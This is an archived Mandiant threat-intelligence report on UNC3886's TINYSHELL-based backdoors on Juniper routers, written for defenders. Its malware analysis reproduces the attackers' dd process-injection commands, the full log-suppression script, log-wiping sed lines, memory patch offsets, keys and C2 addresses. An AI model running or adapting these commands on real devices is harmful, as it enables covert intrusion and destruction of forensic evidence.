{
	"id": "6659a006-e120-4281-9fcd-01e16378217c",
	"created_at": "2026-04-06T00:08:50.875655Z",
	"updated_at": "2026-04-10T13:12:36.801214Z",
	"deleted_at": null,
	"sha1_hash": "99fd1cb12fde3916c86c1226af85a5d816145c8d",
	"title": "Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 190314,
	"plain_text": "Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets\r\nJuniper Routers\r\nBy Mandiant\r\nPublished: 2025-03-12 · Archived: 2026-04-05 20:33:35 UTC\r\nWritten by: Lukasz Lamparski, Punsaen Boonyakarn, Shawn Chew, Frank Tse, Jakub Jozwiak, Mathew Potaczek,\r\nLogeswaran Nadarajan, Nick Harbour, Mustafa Nasser\r\nIntroduction\r\nIn mid 2024, Mandiant discovered threat actors deployed custom backdoors on Juniper Networks’ Junos OS routers.\r\nMandiant attributed these backdoors to the China-nexus espionage group, UNC3886. Mandiant uncovered several\r\nTINYSHELL-based backdoors operating on Juniper Networks’ Junos OS routers. The backdoors had varying custom\r\ncapabilities, including active and passive backdoor functions, as well as an embedded script that disables logging\r\nmechanisms on the target device.\r\nMandiant worked with Juniper Networks to investigate this activity and observed that the affected Juniper MX routers were\r\nrunning end-of-life hardware and software. Mandiant recommends that organizations upgrade their Juniper devices to the\r\nlatest images released by Juniper Networks, which includes mitigations and updated signatures for the Juniper Malware\r\nRemoval Tool (JMRT). Organizations should run the JMRT Quick Scan and Integrity Check after the upgrade. Juniper also\r\nreleased an advisory about this incident.\r\nMandiant has reported on similar custom malware ecosystems in 2022 and 2023 that UNC3886 deployed on virtualization\r\ntechnologies and network edge devices. This blog post showcases a development in UNC3886’s tactics, techniques and\r\nprocedures (TTPs), and their focus on malware and capabilities that enable them to operate on network and edge devices,\r\nwhich typically lack security monitoring and detection solutions, such as endpoint detection and response (EDR) agents. 
\r\nMandiant previously reported on UNC3886's emphasis on techniques to gather and use legitimate credentials to move\r\nlaterally within a network, undetected. These objectives remained consistent but were pursued with the introduction of a new\r\ntool in 2024. Observations in this blog post strengthen our assessment that the actor’s focus is on maintaining long-term\r\naccess to victim networks. UNC3886 continues to show a deep understanding of the underlying technology of the appliances\r\nbeing targeted.\r\nAt the time of writing, Mandiant has not identified any technical overlaps between activities detailed in this blog post and\r\nthose publicly reported by other parties as Volt Typhoon or Salt Typhoon.\r\nAttribution\r\nUNC3886 is a highly adept China-nexus cyber espionage group that has historically targeted network devices and\r\nvirtualization technologies with zero-day exploits. UNC3886’s interests seem to be focused mainly on defense, technology,\r\nand telecommunication organizations located in the US and Asia. The activity described in this blog post is the latest in a\r\nnumber of operations where UNC3886 has leveraged custom malware to target network devices. The malware deployed on\r\nJuniper Networks’ Junos OS routers demonstrates that UNC3886 has in-depth knowledge of advanced system internals.\r\nFurthermore, UNC3886 continues to prioritize stealth in its operations through the use of passive backdoors, together with\r\nlog and forensics artifact tampering, indicating a focus on long-term persistence, while minimizing the risk of detection.\r\nJunos OS\r\nJuniper Networks Junos OS is a proprietary operating system that powers most Juniper routing, switching, and security\r\ndevices. It is based on a modified FreeBSD operating system. 
Junos OS supports two different modes of operation:\r\nCLI mode: where standard Junos OS CLI commands can be issued\r\nShell mode: a user with shell access privileges can access an underlying FreeBSD shell and issue standard FreeBSD\r\ncommands.\r\nThe malware identified in this blog post primarily relies on access to the csh shell, but in some cases it is also aware of higher\r\nlayers.\r\nVeriexec\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 1 of 13\n\nJunos OS incorporates a Verified Exec (veriexec) subsystem, which is a modified version of the original NetBSD Veriexec\r\nSubsystem. Veriexec is a kernel-based file integrity subsystem that protects the Junos OS operating system (OS) against\r\nunauthorized code, including binaries, libraries, and scripts, and against activity that might compromise the integrity of the device. To\r\nrun malware, the threat actor first needed to bypass veriexec protection.\r\nMandiant did not observe evidence indicating successful exploitation of veriexec bypass techniques already addressed by\r\nJuniper in supported software and hardware. However, aside from the process injection technique described later in this blog\r\npost, the infection on the compromised EOL Juniper MX routers indicates that the threat actor successfully deployed executable\r\nbackdoors. Mandiant identified that the threat actor had root access to the impacted devices.\r\nCircumventing Veriexec with Process Injection\r\nVeriexec protection prevents unauthorized binaries from executing. This poses a challenge for threat actors, as disabling\r\nveriexec can trigger alerts. However, execution of untrusted code is still possible if it occurs within the context of a trusted\r\nprocess. Mandiant’s investigation revealed that UNC3886 was able to circumvent this protection by injecting malicious code\r\ninto the memory of a legitimate process. 
This specific technique is now tracked as CVE-2025-21590, as detailed in Juniper\r\nNetworks’ security bulletin JSA93446.\r\nTo achieve this, UNC3886 first gained privileged access to a Juniper router, using legitimate credentials, from a terminal server used for managing\r\nnetwork devices, and entered the FreeBSD shell from the Junos OS CLI. Within the shell\r\nenvironment, they used the “here document” feature to generate a Base64-encoded file named ldb.b64. This encoded file\r\nwas then decoded using base64 to create a compressed archive named ldb.tar.gz, which was subsequently\r\ndecompressed and extracted using the gunzip and tar utilities to extract malicious binaries.\r\nMandiant was unable to recover the full content of ldb.b64 or ldb.tar.gz on the compromised Juniper routers' file\r\nsystem. However, Mandiant successfully recovered three malicious payloads by performing analysis on the memory of a\r\ncompromised router. The purpose of the payloads was as follows:\r\nloader.bin is a shellcode loader responsible for loading functions including exit, mmap, open, read, and\r\nclose from a standard library libc.so.7, allocating memory, and loading and executing the final payload from\r\npayload.bin\r\npc.bin contains a memory address 0x4012f0\r\npayload.bin was identified to be the Position Independent Code (PIC) version of the lmpad backdoor\r\nDetails of the lmpad backdoor are covered in the Malware Analysis section.\r\nMandiant observed the threat actor inject malicious payloads into a newly spawned cat process. 
The actor created a\r\nnamed pipe called null using mkfifo and used cat to continuously read from it, effectively creating a hung process.\r\nThis stage involved the following commands:\r\nrm -rf null;\r\nmkfifo null;\r\ncat null \u0026\r\nset pid=$!\r\necho \" $pid\"\r\nWhile the hung cat process was waiting for data from the null pipe, the threat actor leveraged dd to read binary data\r\nfrom the payload files and write it to specific memory locations inside the cat process.\r\ndd if=loader.bin of=/proc/$pid/mem conv=notrunc obs=1 oseek=0x4012f0\r\ndd if=pc.bin of=/proc/$pid/mem conv=notrunc obs=1 oseek=0x602820\r\nThe first dd command wrote the loader code from loader.bin at the virtual address 0x4012f0, which is the entrypoint\r\nof cat. The second dd command replaced data at 0x602820 with the content of pc.bin. Mandiant noted that\r\n0x602820 is the global offset table entry for fclose; this memory location was overwritten with 0x4012f0, indicating\r\nthat pc.bin contains the memory address where loader.bin was injected.\r\nThe threat actor sent an empty string using echo to the null pipe. cat received an end-of-file signal after echo\r\nfinished writing the data and attempted to close the file by executing fclose.\r\nAs the global offset table entry for the fclose function was replaced with the entrypoint to the shellcode loader, cat\r\nexecuted the shellcode loader instead of the actual fclose function, and ultimately loaded the final payload from\r\npayload.bin in the same directory.\r\nAfter payload.bin had been loaded, the threat actor removed the null file and the ldb directory, then terminated the\r\ncurrent session. 
This left only the legitimate process running on the compromised router, now containing the malicious code.\r\nThe following commands were used to achieve these actions:\r\nsleep 1;echo -n\u003enull;sleep 1;rm -rf null\r\ncd ..\r\nrm -rf ldb\r\nkill -9 $$\r\nMandiant’s investigation noted that this process injection is intended for executing the PIC version of the lmpad backdoor\r\nwhile veriexec is enabled and does not support execution of other backdoors identified on the file system of the\r\ncompromised Juniper routers.\r\nMalware Overview\r\nMandiant’s investigation identified six distinct malware samples across multiple Juniper MX routers. Each sample is a\r\nmodified version of a TINYSHELL backdoor, but with unique capabilities. All of these samples incorporate a core\r\nTINYSHELL backdoor functionality, but differ greatly when it comes to activation methods as well as additional, Junos OS\r\nspecific features.\r\nThe following malware samples were identified:\r\n1. appid - TINYSHELL-based active backdoor, mimicking a legitimate binary named appidd (Application\r\nIdentification Daemon)\r\n2. to - TINYSHELL-based active backdoor, mimicking a legitimate binary named top (Table of Processes)\r\n3. irad - TINYSHELL-based passive backdoor, mimicking a legitimate binary named irsd (Interface Replication and\r\nSynchronization Daemon)\r\n4. lmpad - TINYSHELL-based utility and passive backdoor, mimicking a legitimate binary named lmpd (Link\r\nManagement Protocol Daemon)\r\n5. jdosd - TINYSHELL-based passive backdoor, mimicking a legitimate binary named jddosd (Juniper DDOS\r\nprotection Daemon)\r\n6. 
oemd - TINYSHELL-based passive backdoor, mimicking a legitimate binary named oamd (Operation,\r\nAdministration and Maintenance Daemon)\r\nTINYSHELL\r\nTINYSHELL is a publicly available lightweight backdoor written in C that communicates using a custom binary protocol.\r\nThe standard set of TINYSHELL commands comprises:\r\nRemote file upload\r\nRemote file download\r\nEstablishing remote shell session\r\nA basic TINYSHELL implementation for FreeBSD appears to be the foundation for the heavily customized backdoors detailed\r\nbelow.\r\nMalware Analysis\r\nappid — TINYSHELL-Based Active Backdoor\r\nSample one, named appid, is an active backdoor written in C. It is derived from the publicly available TINYSHELL\r\nsource code with additional supported commands. It communicates with the following hardcoded\r\ncommand and control (C2) servers:\r\nTCP://129[.]126[.]109[.]50:22\r\nTCP://116[.]88[.]34[.]184:22\r\nTCP://223[.]25[.]78[.]136:22\r\nTCP://45[.]77[.]39[.]28:22\r\nMandiant believes these IPs are staging nodes of a GOBRAT ORB network, eventually leading to a single, backend\r\nAdversary Controlled Operations Server (“ACOS”).\r\nThis malware begins by communicating to a random C2 server from the list. The malware maintains two TCP sockets that\r\nwill stay synchronized with the same C2 address. One socket is used for tasking requests and the other is for handling\r\nrequests. The malware will rotate through the list of C2 servers until a successful connection is created and it will request a\r\ntask using the first socket. After receiving a task from the C2, the malware then creates a second socket for handling this\r\nspecific task. After the task is finished, the second socket is closed.\r\nThe malware encrypts all network traffic with AES using a hard-coded key. 
The following commands are supported by the\r\nmalware, consisting of standard TINYSHELL commands and added proxy and reconfiguration capabilities:\r\nNumber Name Description Comment\r\n1 tshd_get_file Sends a file to the server Standard TINYSHELL command\r\n2 tshd_put_file Downloads a file from the server Standard TINYSHELL command\r\n3 tshd_runshell Launches an interactive /bin/sh shell session Standard TINYSHELL command\r\n4 tshd_setproxy Establish a Socks proxy to a given IP+port number Custom command\r\n5 tshd_config Change Configuration Menu Custom command\r\nThe following is the list of configuration items that can be changed by the command number 5 (tshd_config) and their\r\nassociated config menu numbers:\r\nNumber Config Item\r\n11 C2 IP Address 1\r\n12 C2 IP Address 2\r\n13 C2 IP Address 3\r\n14 C2 IP Address 4\r\n2 C2 Port Number\r\n3 C2 Network Interface\r\n4 Sleep Timeout\r\n0 Exit Config Menu\r\nto — TINYSHELL-Based Active Backdoor\r\nSample two, named to, is the same as Sample 1 but with different hardcoded C2 servers:\r\ntcp://101[.]100[.]182[.]122:22\r\ntcp://118[.]189[.]188[.]122:22\r\ntcp://158[.]140[.]135[.]244:22\r\ntcp://8[.]222[.]225[.]8:22\r\nirad — TINYSHELL-Based Passive Backdoor\r\nSample three, named irad, is a TINYSHELL-based passive backdoor written in C. It acts as a libpcap-based packet sniffer\r\nand receives commands by inspecting packets on the wire looking for a magic-string that activates its backdoor capabilities.\r\nThe malware supports two modes of operation: an active mode, in which it connects to a provided C2 address, and a passive\r\nlistening mode. 
In addition to the 3 standard TINYSHELL commands, it implements 2 custom commands and a custom\r\nactivation routine.\r\nThe malware uses the libpcap library to capture all network packets on the host (interface specified in the eth environment\r\nvariable) matching the BPF filter icmp[4:2] == 0xaa56. It reads 16 bytes of data starting at offset 10 from the ICMP\r\npacket. The malware has insufficient bounds checking and could read past the end of a packet payload if a smaller than\r\nexpected packet is encountered.\r\nFor any ICMP type code 8 (Echo request) packets, it reads the 16 bytes of data and decrypts it with a single-byte XOR key\r\n0x86. It then compares the decrypted data with a magic string uSarguuS62bKRA0J. If the string matches and byte 8 of\r\nthe ICMP packet matches ASCII character 1 or 2, it then reads the target IP and TCP port number from the ICMP packet\r\nand establishes a TCP connection to the specified IP (active mode). It uses a custom AES and HMAC implementation to\r\nencrypt and authenticate the communication. It uses a hardcoded key string WZtOTig2m42gXB6U to derive session keys and a\r\nhardcoded authentication token 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D to authenticate a target.\r\nAfter authenticating a connection to a target host it starts encrypted communication. If the response from the target host\r\nbegins with the string ek63a21km7WSWkfk then it exits, otherwise it decodes the command number from the packet:\r\nCommand Number Function Comment\r\n1 Upload a file to the remote host Standard TINYSHELL command\r\n2 Download a file from the remote host Standard TINYSHELL command\r\n3 Launch an interactive /bin/csh session Standard TINYSHELL command\r\n4 Does nothing Custom command\r\n5 Relay the current connection to a specified IP and Port Custom command\r\nIf byte 8 of the ICMP packet is 0, the malware will spawn a listening server on TCP port 31234 (passive mode). 
The\r\nlistening backdoor server supports the same set of 5 commands as listed in the previous table, and the same encryption and\r\nauthentication protocol.\r\nIf the string 1spCq0BMbJwCoeZn is received, and the malware is currently operating as a listener and accepting connections\r\non port 31234, then it will terminate the listening process.\r\nlmpad — TINYSHELL-Based Utility and Passive Backdoor\r\nSample four, named lmpad, is a utility and a passive backdoor written in C. In addition to standard TINYSHELL\r\ncapabilities it can also launch an external script that can perform process injection into two legitimate Junos OS processes to\r\ninhibit logging. The main purpose of this malware is to disable all possible logging before the operator connects to the router\r\nto perform hands-on activities and then later restore the logs after the operator disconnects.\r\nThe malware begins by attempting to receive a UDP packet on port 33615, where it receives an RC4-encrypted message and\r\nsends an acknowledgement message in response. The malware also checks the decrypted received payload against the\r\nfollowing hex bytes, terminating the connection if it doesn't match.\r\n26 e7 2b 3a 1c a2 16 2d 61 89 57 a9 cd 4c e7 3c\r\nThe RC4 encryption key used to decrypt received UDP messages is: 0b3330c0b41d1ae2.\r\nAfter the initial check, the malware enters a listening mode, waiting for commands. In addition to standard TINYSHELL\r\ncommands (commands 2, 4 and 5) it also implements 5 other custom commands:\r\nCommand 0\r\nThis command inhibits logging in preparation for hands-on threat actor activity on the router. It begins by writing a\r\ncompressed zip archive to the file /var/tmp/pfed_jdhcp6_trace.log. 
It then executes the following command line to\r\ndecompress the archive, execute an embedded script with argument pre and clean up the script after execution:\r\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c \u003e /var/tmp/pfed_jdhcp6_trace.log.bak;\r\nsh /var/tmp/pfed_jdhcp6_trace.log.bak pre ;\r\nrm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\r\nkill -9 $$\r\nThe following is the uncompressed script file:\r\npre_ssh() {\r\n#closelog\r\ncp /mfs/var/etc/syslog.conf /mfs/var/etc/syslog.conf0\r\nsed -i '' 's/\\/dev\\/null #//g' /mfs/var/etc/syslog.conf0\r\nsed -i '' 's/ / \\/dev\\/null #/g' /mfs/var/etc/syslog.conf\r\nps -fcA |grep eventd | awk '{ print $1 }' | xargs kill -1\r\n#last\r\ncp -r /var/log/utx.log /var/log/utx.log0\r\ncp -r /var/log/wtmp /var/log/wtmp0\r\n}\r\npost_ssh() {\r\n#relog\r\ncp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf\r\nrm -f /mfs/var/etc/syslog.conf0\r\nps -fcA | grep eventd | awk '{ print $1 }' | xargs kill -1\r\n#relast\r\ncp -r /var/log/wtmp0 /var/log/wtmp\r\ncp -r /var/log/utx.log /var/log/utx.log0\r\nrm -f /var/log/wtmp0\r\n}\r\nbackup() {\r\n#backconf\r\nrm -rf /var/rundb+\r\ncp -r /var/rundb /var/rundb+\r\ncp /var/db/commits /usr/lib/libjucomm.so.1\r\ntar -cf /config/usage_db /config/juniper.conf.*\r\ntar -cf /var/db/config/usage_db /var/db/config/juniper.conf.*\r\n}\r\nrestore() {\r\n#reconfig\r\ncp -r /var/rundb+/* /var/rundb\r\ncp /usr/lib/libjucomm.so.1 /var/db/commits\r\ntar -xf /config/usage_db -C /\r\ntar -xf /var/db/config/usage_db -C /\r\nrm -r /var/rundb+\r\nrm -f /usr/lib/libjucomm.so.1\r\nrm -f /config/usage_db\r\nrm -f /var/db/config/usage_db\r\n}\r\nif [ $1 = \"pre\" ]; then\r\npre_ssh\r\nelif [ $1 = \"post\" ]; then\r\npost_ssh\r\nelif [ $1 = \"backup\" ]; then\r\nbackup\r\nelif [ $1 = \"restore\" ]; then\r\nrestore\r\nfi\r\necho done\r\nexit 0\r\nThis script can execute 4 
commands:\r\n1. pre : backs up syslog.conf as syslog.conf0, redirects all logging to /dev/null, sends a HUP signal to the\r\neventd daemon responsible for logging, and backs up the last log and wtmp log.\r\n2. post : reverses the changes made by pre_ssh; it restores the original syslog.conf as well as the last log and wtmp log,\r\nremoves the backups and sends another HUP signal to the eventd process.\r\n3. backup : backs up the current Juniper configuration database and commit logs and archives configuration files.\r\n4. restore : restores the previously backed up configuration database and config files and removes the backups.\r\nAfter stopping logging with the pre_ssh script, this command then reads the snmpd process PID from /var/run/snmpd.pid.\r\nIt also reads 4 bytes of data from address 0x8601328 and writes them to the file /var/tmp/rts using dd:\r\ndd if=/proc/\u003cpid\u003e/mem of=/var/tmp/rts bs=1 count=4 iseek=0x8601328 2\u003e/dev/null\r\nIt then changes this data to 0, writes it to /var/tmp/rts, and later writes it back to snmpd process memory using the same dd\r\ntechnique:\r\ndd of=/proc/\u003cpid\u003e/mem if=/var/tmp/rts bs=1 count=4 oseek=0x8601328\r\nconv=notrunc 2\u003e/dev/null\r\nThis patches the snmpd process memory at address 0x8601328. The patch sets a global variable named trap_configs to\r\n0. trap_configs possibly points to a structure containing SNMP traps that are sent to the monitoring server. Effectively\r\nthis stops SNMP traps from being triggered, which is most likely done to stop SNMP traps from firing when specific\r\nevents stop being logged in syslog.\r\nThe malware then repeats similar actions against the mgd (Juniper Management Daemon) process. It reads the mgd process\r\nPID from /var/run/mgd.pid and, using the same technique previously mentioned, reads 4 bytes from mgd process\r\nmemory at 0x84E90D8. 
It compares these bytes to 57E58955 (which, after swapping endianness, disassembles to the instructions PUSH\r\nRBP; MOV EBP,ESP; PUSH RDI, a typical function prologue), and if they match, it patches them with the\r\nfollowing bytes: C3D08990. If we disassemble these bytes in little-endian order, we get the NOP; MOV EAX,EDX; RET\r\ninstructions.\r\nThis patch modifies the prologue of the function at 0x84E90D8 to NOP; MOV EAX,EDX; RET, effectively skipping the rest of\r\nthe function. Based on the behavioral analysis, the goal of this patch is likely to stop auditd logging of MGD login,\r\nlogout, and cmd events.\r\nThis direct memory manipulation using dd allows the attacker to alter program behavior and bypass security measures.\r\nUNC3886 previously used a similar tactic, where dd was used to disable file system verification on startup. In that case,\r\nUNC3886 exploited a vulnerability (CVE-2022-41328) to overwrite legitimate FortiOS system binaries, achieving\r\npersistence and evading security checks.\r\nCommand 1\r\nThis command can reverse operations performed by Command 0 after the operator has finished their hands-on-keyboard\r\noperations. It restores logging by executing sh /var/tmp/pfed_jdhcp6_trace.log.bak post, and it also reverses the patches to\r\nsnmpd and mgd.\r\nCommand 2 — Launch CSH Session\r\nThis command launches an interactive /bin/csh session over the UDP connection, with a forked process encrypting the\r\ninput and output of the shell and transmitting it over the network.\r\nBefore executing the remote shell, this command launches a series of sed commands to remove specific lines from log files:\r\nsed -i '' '/root/d' /var/log/interactive-commands\r\nsed -i '' -e '/vi/d' -e '/set/d' -e '/gdb/d' -e '/mgd/d' /root/.history\r\nsed -i '' '/root/d' /var/log/messages\r\nsed -i '' '/root/d' /var/log/auth\r\nThese remove lines containing the term root from /var/log/interactive-commands, /var/log/messages, and\r\n/var/log/auth. 
They also remove instances of vi, set, gdb, and mgd from /root/.history.\r\nCommand 3 — Request New Sleep Timeout\r\nThis command will cause the malware to send a reply to the connection containing the value of the current sleep timeout.\r\nThe response to that message will contain the new 4-byte sleep timeout that will be used by the main command loop (in\r\nseconds).\r\nCommand 4 — File Upload\r\nThis command will cause the malware to send a specified file to the remote server.\r\nCommand 5 — File Download\r\nThis command will cause the malware to download a file from the remote server and write it to the disk.\r\nCommand 6 — Backup Configuration Database\r\nThis command causes the malware to execute the same script as Command 0 but with argument backup to back up the Juniper\r\nconfiguration database and commit logs.\r\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c \u003e /var/tmp/pfed_jdhcp6_trace.log.bak;\r\nsh /var/tmp/pfed_jdhcp6_trace.log.bak backup ;\r\nrm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\r\nkill -9 $$\r\nCommand 7 — Restore configuration database\r\nThis command causes the malware to execute the same script as Command 0 but with argument restore to restore the Juniper\r\nconfiguration database and commit logs:\r\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c \u003e /var/tmp/pfed_jdhcp6_trace.log.bak;\r\nsh /var/tmp/pfed_jdhcp6_trace.log.bak restore ;\r\nrm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\r\nkill -9 $$\r\nCommand 8 - Receive new socket timeout value\r\nThis command will cause the malware to send a reply to the connection containing the value of the current socket timeout.\r\nThe response to that message will contain the new 4-byte value that will be used to update the main socket timeout. 
The\r\ndefault socket timeout value is 300 seconds.\r\nIf any other command is passed, the malware will close the socket and exit.\r\njdosd — TINYSHELL-Based Passive Backdoor\r\nSample five, named jdosd, is a passive backdoor written in C. It implements a UDP backdoor operating on a fixed port\r\nnumber which provides file transfer and remote shell capabilities.\r\nThe malware binds to UDP port 33512 and uses a custom RC4 implementation. This implementation has a bug in it where it\r\ndoesn't properly retrieve a final state box value during its PRGA generation. The following key is used for the traffic\r\nencryption:\r\n4fd37426-65dd-4a8d-8ba6-1382a011dae9\r\nThe attacker initiates the connection to the backdoor by sending a magic value 0xDEADBEEF. The malware responds to this\r\nmessage by sending the same message in response, encrypted with custom RC4. The malware will then send the process ID\r\n(pid) of its own process to the C2.\r\nAfter the initial beacon the malware waits for additional commands. In addition to standard TINYSHELL commands (1-3),\r\nthere are two additional commands supported (0xAC, 0xFF):\r\nCommand Code Description Comment\r\n1 Upload data. Reads a file path from the received data stream and sends the contents of the file to the remote host. Standard TINYSHELL command\r\n2 Reads a file name from the data stream, creates it, then reads the file contents to write to that file from the data stream. Standard TINYSHELL command\r\n3 Launches an interactive /bin/csh session, with all input and output marshaled across the UDP connection. Standard TINYSHELL command\r\n0xAC Does nothing Custom command\r\n0xFF Exits the Program Custom command\r\noemd — TINYSHELL-Based Passive Backdoor\r\nSample six, named oemd, is a passive backdoor written in C. 
The backdoor receives the C2 address and port by binding on\r\nspecific network interfaces. Network interfaces are stored in an environment variable. The backdoor communicates with the\r\nC2 over TCP. Communication with the C2 is AES-encrypted and XOR-encoded.\r\nThe malware configuration is stored in the following environment variables:\r\nINTFS : The network interfaces' names to bind to.\r\nRTS : The routing addresses to bind to (instead of interfaces).\r\nUPRT : The port to bind to (if not specified, 45678 is used).\r\nDAEMON : Run the sample in the background.\r\nDuring initialization, the malware executes the following command to retrieve the local-index number of an interface specified in the\r\nINTFS environment variable:\r\nifinfo '\u003cinterface\u003e' | grep local-index | grep -Eo '[0-9]+'\r\nAfter setting up a local UDP socket, the malware binds to 0.0.0.0:\u003cport\u003e on the specified interfaces and waits for the\r\nattacker to send the C2 address and port. After receiving a C2 address on the UDP socket it establishes a new TCP\r\nconnection to the provided target.\r\nThe malware supports a set of standard TINYSHELL commands:\r\n1 : Upload a file.\r\n2 : Download a file.\r\n3 : Execute a shell command.\r\nWhen executing shell commands, the malware clears the HISTFILE environment variable and allows the attacker to specify\r\nthe TERM value.\r\nJunos OS Specific Socket Options\r\nAll the previously listed samples create an AF_ROUTE socket using socket(AF_ROUTE(17), SOCK_SEQPACKET(5), 0).\r\nRunning these samples on a standard FreeBSD system would return an invalid socket, hence we believe this to be a\r\nJunos OS specific implementation.\r\nWe believe that this socket is used to establish a connection for communicating with the operating system's routing\r\nsubsystem. The AF_ROUTE constant designates the socket family for routing operations, and SOCK_SEQPACKET specifies a\r\nreliable, message-oriented connection. 
This socket is used to read and write a packet similar in structure to rt_* messages\r\non OpenBSD to retrieve the interface index. Of all the samples, only oemd uses the ifinfo command to retrieve the\r\ninterface index, while the other samples use custom rt_* messages via the socket.\r\nThe custom message contains an interface name and a logical sub-interface. On Juniper routing devices, instead of tagging\r\npackets with VLAN IDs, sub-interfaces act as distinct interfaces with their own IP addresses, routing configurations, and\r\npotentially different security policies. The interface index value is then passed into a setsockopt call for a command and\r\ncontrol socket, either TCP or UDP.\r\nActivity in Linux Environments\r\nMandiant continued to observe UNC3886 leverage similar TTPs and use the same malware and utilities as detailed in our\r\nprevious blog post, as follows:\r\nCommand execution and persistence using a combination of rootkits and utilities, including REPTILE and MEDUSA\r\nwith SEAELF loader, and BUSYBOX.\r\nInstead of using the publicly available kubo/injector as noted previously, Mandiant observed UNC3886 deploy\r\nPITHOOK along with a custom SSH server based on the publicly available wzshiming/sshd project to hijack SSH\r\nauthentications and capture SSH credentials.\r\nThe TACACS+ daemon binary was replaced by a backdoored version of the binary with similar malicious functions for\r\ncapturing credentials.\r\nUse of GHOSTTOWN malware for anti-forensics purposes.\r\nMandiant’s investigation did not observe evidence of data staging and exfiltration.\r\nOutlook and Implications\r\nThis blog post further highlights that China-nexus espionage actors are continuing to compromise networking infrastructure\r\nwith custom malware ecosystems. 
While UNC3886 previously focused their operations on network edge devices, this activity demonstrated they’re also targeting internal networking infrastructure, such as Internet Service Provider (ISP) routers.\r\nMandiant observed the threat actor targeting network authentication services, including the Terminal Access Controller Access-Control System (TACACS+), and terminal servers with access to the routers to gain privileged initial access. This privileged access allowed the threat actor to enter Junos OS shell mode and perform restricted operations. Investigating further actions taken by the threat actor was hampered by the challenges inherent in analyzing proprietary network devices, which required novel methods for artifact acquisition and analysis.\r\nMandiant recommends organizations:\r\nUpgrade Juniper devices and run security checks: Organizations should upgrade their Juniper devices to the latest images, which contain mitigations and updated signatures for JMRT, and run the JMRT Quick Scan and Integrity Check after the upgrade. 
\r\nSecure Authentication: Implement a centralized Identity and Access Management (IAM) system with robust multi-factor authentication (MFA) and granular role-based access control (RBAC) for managing network devices.\r\nConfiguration Management: Implement a network configuration management solution that supports configuration validation against defined templates and standards, with the ability to automatically remediate deviations or trigger alerts for manual intervention.\r\nEnhanced Monitoring: Address and prioritize high-risk administrative activities and implement monitoring solutions with a process to regularly review the effectiveness of detection.\r\nVulnerability Management: Prioritize patching and mitigation of vulnerabilities in network devices, including those in lesser-known operating systems.\r\nDevice Lifecycle Management: Implement a device lifecycle management program that includes proactive monitoring, automated software updates, and end-of-life (EOL) replacement planning to ensure network devices are always supported and secure.\r\nSecurity Hardening: Strengthen the security posture of network devices, administrative devices and systems used for managing network devices by implementing strict access controls, network segmentation, and other security measures.\r\nThreat Intelligence: Proactively leverage threat intelligence to continually evaluate and improve the effectiveness of security controls against emerging threats.\r\nThe compromise of routing devices is a recent trend in the tactics of espionage-motivated adversaries, as it grants long-term, high-level access to crucial routing infrastructure, with the potential for more disruptive actions in the future. 
A concerted effort is required to safeguard these critical systems and ensure the continued stability and security of the internet.\r\nOrganizations potentially impacted by this campaign are strongly advised to engage Mandiant's Custom Threat Hunt service. Mandiant's team of security experts can proactively identify and mitigate hidden threats, providing clarity and confidence in your security posture.\r\nAcknowledgement\r\nThis analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE. A special thanks goes to Paul Tarter, Adam Markun, and Ange Albertini who contributed to analysis of the malware detailed in this blog post.\r\nIndicators of Compromise\r\nA Google Threat Intelligence Collection of IOCs is available for registered users. For Google Security Operations Enterprise+ customers, rules have been released to your Emerging Threats rule pack, and indicators of compromise (IOCs) listed in this blog post are available for prioritization with Applied Threat Intelligence.\r\nDetection\r\nYARA-L Rules\r\nRelevant rules are available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set.\r\nSEAELF Installer Execution\r\nGHOSTTOWN Utility Execution\r\nREPTILE Rootkit Command Line Argument Tampering\r\nREPTILE Rootkit Cmd Component Usage\r\nREPTILE Rootkit Shell Component Usage\r\nREPTILE Rootkit Hide Command Usage\r\nYARA Rules\r\nrule M_Hunting_PacketEncryptionLayer_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n $pel_1 = \"pel_client_init\"\r\n $pel_2 = \"pel_server_init\"\r\n $pel_3 = \"pel_setup_context\"\r\n $pel_4 = \"pel_send_msg\"\r\n $pel_5 = \"pel_recv_msg\"\r\n $pel_6 = \"pel_send_all\"\r\n $pel_7 = \"pel_recv_all\"\r\n $pel_8 = \"pel_errno\"\r\n $pel_9 = \"pel_context\"\r\n $pel_10 = \"pel_ctx\"\r\n $pel_11 = \"send_ctx\"\r\n $pel_12 = \"recv_ctx\"\r\n condition:\r\n 4 of ($pel_*)\r\n}\r\nrule M_Hunting_TINYSHELL_5\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n $tsh_1 = \"tsh_get_file\"\r\n $tsh_2 = \"tsh_put_file\"\r\n $tsh_3 = \"tsh_runshell\"\r\n $tshd_1 = \"tshd_get_file\"\r\n $tshd_2 = \"tshd_put_file\"\r\n $tshd_3 = \"tshd_runshell\"\r\n 
